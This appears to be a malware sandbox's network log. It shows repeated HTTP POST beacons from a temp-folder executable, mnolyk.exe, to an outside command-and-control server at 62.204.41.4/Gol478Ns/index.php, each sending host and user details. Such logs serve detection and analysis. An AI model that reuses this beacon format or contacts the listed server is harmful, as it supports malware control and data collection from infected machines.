                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:24.465754986 CET | 339 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        138 | 192.168.2.5 | 49828 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:24.646924973 CET | 339 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:24.711596966 CET | 340 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        139 | 192.168.2.5 | 49829 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:24.880676985 CET | 340 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:24.943907022 CET | 341 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        14 | 192.168.2.5 | 49704 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:32.045624018 CET | 214 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:32.117239952 CET | 215 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        140 | 192.168.2.5 | 49830 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:25.114846945 CET | 341 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:25.180715084 CET | 342 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        141 | 192.168.2.5 | 49831 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:25.452284098 CET | 342 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:25.517364025 CET | 343 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        142 | 192.168.2.5 | 49832 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:25.693521023 CET | 343 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:25.756983042 CET | 344 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        143 | 192.168.2.5 | 49833 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:25.956223965 CET | 344 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:26.021404982 CET | 345 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        144 | 192.168.2.5 | 49834 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:26.192656994 CET | 345 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:26.258816957 CET | 346 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        145 | 192.168.2.5 | 49835 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:26.426112890 CET | 346 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:26.489983082 CET | 347 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        146 | 192.168.2.5 | 49836 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:26.660548925 CET | 347 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:26.724510908 CET | 348 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        147 | 192.168.2.5 | 49837 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:26.897782087 CET | 348 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:26.959956884 CET | 349 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        148 | 192.168.2.5 | 49838 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:27.131716013 CET | 349 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:27.198204041 CET | 350 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        149 | 192.168.2.5 | 49839 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:27.377568007 CET | 350 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:27.444006920 CET | 351 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        15 | 192.168.2.5 | 49705 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:32.323528051 CET | 215 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:32.386897087 CET | 216 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        150 | 192.168.2.5 | 49840 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:27.625202894 CET | 351 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:27.689275026 CET | 352 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        151 | 192.168.2.5 | 49841 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:27.862567902 CET | 352 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:27.928556919 CET | 353 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        152 | 192.168.2.5 | 49842 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:28.111422062 CET | 353 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:28.177723885 CET | 354 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        153 | 192.168.2.5 | 49843 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:28.350641966 CET | 354 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:28.415501118 CET | 355 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        154 | 192.168.2.5 | 49844 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:28.581101894 CET | 355 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:28.644062996 CET | 356 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        155 | 192.168.2.5 | 49845 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:28.815135002 CET | 356 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:28.877813101 CET | 357 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        156 | 192.168.2.5 | 49846 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:29.052087069 CET | 357 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:29.116605043 CET | 358 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        157 | 192.168.2.5 | 49847 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:29.282943964 CET | 358 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:29.346607924 CET | 359 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        158 | 192.168.2.5 | 49848 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:29.531647921 CET | 359 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:29.596512079 CET | 360 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        159 | 192.168.2.5 | 49849 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:29.835563898 CET | 360 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
